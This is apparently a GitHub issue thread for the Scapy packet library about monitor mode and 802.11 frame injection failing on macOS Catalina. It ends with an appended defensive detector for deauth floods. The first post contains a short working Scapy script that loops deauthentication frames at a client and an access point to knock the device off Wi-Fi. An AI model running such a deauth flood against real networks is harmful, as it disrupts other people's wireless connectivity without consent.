secdev / scapy

Scapy: the Python-based interactive packet manipulation program & library.
https://scapy.net
GNU General Public License v2.0

macOS Catalina monitor mode #2154

Closed mickael-btc closed 5 years ago

mickael-btc commented 5 years ago

Brief description

I am trying to deauth a device with Scapy on macOS Catalina, but instead of sending packets my Mac just powers off. It seems to be a problem with the "en0" wifi interface, which probably has problems working with Scapy in monitor mode. My Mac crashes only when I put the "monitor=True" param. When I run my code without that param the code runs fine, but it doesn't deauth the device. I tested the same script on Kali Linux with Python 2.7.16 and Scapy 2.40 and it worked well: the device was disconnected.

Environment

How to reproduce

from scapy.all import *
conf.use_pcap = True

# real MAC addresses are hidden
ap = "FF:FF:FF:FF:FF:FF"
c = "FF:FF:FF:FF:FF:FF"

pkt = RadioTap()/Dot11(addr1=c, addr2=ap, addr3=ap)/Dot11Deauth(reason=2)
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=c, addr3=c)/Dot11Deauth(reason=2)

while True:
    sendp(pkt, iface="en0", monitor=True)
    sendp(pkt1, iface="en0", monitor=True)

Actual result

My MacBook just powers off when I try to send packets.

Expected result

Deauth a device by sending a deauth frame to it and to the router.

gpotter2 commented 5 years ago

This is very probably a Catalina bug (still in beta). The fact that it shuts down is a sign of a pretty severe failure :/ This should probably get reported, though they probably know about it already.

It is also possible that they have changed the way we should set an interface into monitor mode (we were using a sort of hack), therefore Scapy would need an update.

Even if Scapy requires changes, we can't do much before the official release.

mickael-btc commented 5 years ago

Thanks for your answer. I'll wait for the release to see the changes. Hope it will be fixed.

guedou commented 5 years ago

Do you have a similar effect with tcpdump --monitor-mode or /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport?

mickael-btc commented 5 years ago

What works

When I run these two commands my wifi logo changes to monitor mode.

The code and command below change wifi to promisc mode only:

from scapy.all import *
conf.use_pcap
p = sniff()
p.summary()

What doesn't work

Yesterday I reinstalled Scapy, pypcap, libdnet and some other packages, and I noticed that my Mac doesn't shut down anymore (except when I write conf.use_pcap = False instead of conf.use_pcap = True).
Now the script runs "fine" in Python 2.7.16 and 3.7 without crashing. But it still doesn't deauth devices and still doesn't put macOS in monitor mode, even though I can sniff with Scapy in promisc mode.

When I interrupt the script with ^C I get this message in the two versions of Python:

File "/Users/rubikon/Desktop/script.py", line 11, in <module>
    sendp(pkt, iface="en0", monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/sendrecv.py", line 326, in sendp
    socket = conf.L2socket(iface=iface, *args, **kargs)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
    self.outs = open_pcap(iface, MTU, self.promisc, 100)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 435, in <lambda>
    open_pcap = lambda *args, **kargs: _PcapWrapper_pcapy(*args, **kargs)  # noqa: E501
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 398, in __init__
    self.pcap = pcap.open_live(device, snaplen, promisc, to_ms)   # noqa: E501
KeyboardInterrupt
File "/Users/rubikon/Desktop/script.py", line 11, in <module>
    sendp(pkt, iface="en0", monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 326, in sendp
    socket = conf.L2socket(iface=iface, *args, **kargs)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
    self.outs = open_pcap(iface, MTU, self.promisc, 100)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 341, in <lambda>
    open_pcap = lambda *args, **kargs: _PcapWrapper_pypcap(*args, **kargs)  # noqa: E501
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 308, in __init__
    self.pcap = pcap.pcap(device, snaplen, promisc, immediate=1, timeout_ms=to_ms, rfmon=monitor)  # noqa: E501
KeyboardInterrupt

It's probably useless, but you never know...

guedou commented 5 years ago

I am surprised that the other methods do not crash macOS too. What does this command do?

$ cat test_sniff.py 
from scapy.all import *

s = sniff(count=1, timeout=1, monitor=True)
if len(s):
    s.nsummary()

mickael-btc commented 5 years ago

I get this error in the two versions of Python:

Traceback (most recent call last):
  File "test.py", line 3, in <module>
    s = sniff(count=1, timeout=1, monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 836, in sniff
    *arg, **karg)] = iface
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 58, in __init__
    (self.ins, self.dev_bpf) = get_dev_bpf()
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 98, in get_dev_bpf
    raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !

Currently I'm using Scapy 2.4.2 with the changes you made in /arch/unix.py. I think it's a Catalina problem: I found software on macOS that can deauth, but it doesn't work either. Do you have a link to a working Scapy version?

guedou commented 5 years ago

You need to start the script as root.

mickael-btc commented 5 years ago

Oh sorry. When I ran it with sudo I got:

guedou commented 5 years ago

I don't know what this error means; however, the RadioTap header means that monitor mode works fine, as you are able to sniff raw 802.11 frames.

mickael-btc commented 5 years ago

I redid the tests and yes, monitor mode is activated 😅 Thanks a lot. The issue was that I didn't run sudo airport -z the first time. But I have a question: why can't I deauth a device? Is there a bug or is my code wrong?

guedou commented 5 years ago

I am not sure that 802.11 injection with Scapy was ever tested on macOS =\

guedou commented 5 years ago

I can't inject on macOS 10.14 either, and did not find a tool that can. I believe that this is not related to Scapy.

Please reopen the issue if you find a tool that can inject frames.
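The defender's counterpart to this thread: monitor mode on macOS does let you sniff raw 802.11 frames, so the same RadioTap()/Dot11()/Dot11Deauth() layout used in the first post can be watched for deauth floods. This is an added example, not code from the thread or from Scapy; it parses that layout with the standard library only (so it runs without Scapy installed), and `sample_deauth`, the MAC addresses and the thresholds are constructed for the demonstration.

```python
import struct
from collections import defaultdict, deque

MGMT_TYPE, DEAUTH_SUBTYPE = 0, 12   # 802.11 management frame, Deauthentication subtype

def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame: bytes):
    """Return (transmitter, receiver, reason) for a RadioTap-wrapped deauth frame, else None."""
    if len(frame) < 4 or frame[0] != 0:            # RadioTap: version(1) pad(1) length(2, LE) ...
        return None
    rt_len = struct.unpack_from("<H", frame, 2)[0]
    dot11 = frame[rt_len:]
    if len(dot11) < 26:                             # FC(2) dur(2) addr1-3(18) seq(2) reason(2)
        return None
    fc = dot11[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if (ftype, subtype) != (MGMT_TYPE, DEAUTH_SUBTYPE):
        return None
    receiver, transmitter = _mac(dot11[4:10]), _mac(dot11[10:16])   # addr1, addr2 as in Dot11()
    reason = struct.unpack_from("<H", dot11, 24)[0]                  # Dot11Deauth.reason (LE short)
    return transmitter, receiver, reason

class DeauthFloodDetector:
    """Alert when one transmitter sends more than `threshold` deauths within `window` seconds."""
    def __init__(self, threshold: int = 10, window: float = 5.0):
        self.threshold, self.window = threshold, window
        self._seen = defaultdict(deque)             # transmitter MAC -> timestamps of its deauths

    def feed(self, ts: float, frame: bytes):
        parsed = parse_deauth(frame)
        if parsed is None:
            return None                             # not a deauth frame, nothing to count
        tx, rx, reason = parsed
        q = self._seen[tx]
        q.append(ts)
        while q and ts - q[0] > self.window:        # forget deauths older than the window
            q.popleft()
        if len(q) > self.threshold:
            return f"deauth flood from {tx} to {rx}: {len(q)} frames in {self.window}s (reason {reason})"
        return None

def sample_deauth(tx: str, rx: str, reason: int = 2) -> bytes:
    """Constructed test input: bare 8-byte RadioTap header + deauth, same layout as the first post's frames."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    dot11 = struct.pack("<BBH", 0xC0, 0, 0) + mac(rx) + mac(tx) + mac(tx) + struct.pack("<H", 0)
    return struct.pack("<BBHI", 0, 0, 8, 0) + dot11 + struct.pack("<H", reason)
```

To run it live, feed `parse_deauth`/`feed` the raw bytes of each packet from `sniff(monitor=True, ...)` (for example `bytes(pkt)` with `pkt.time`), with the same root and `airport -z` requirements discussed above.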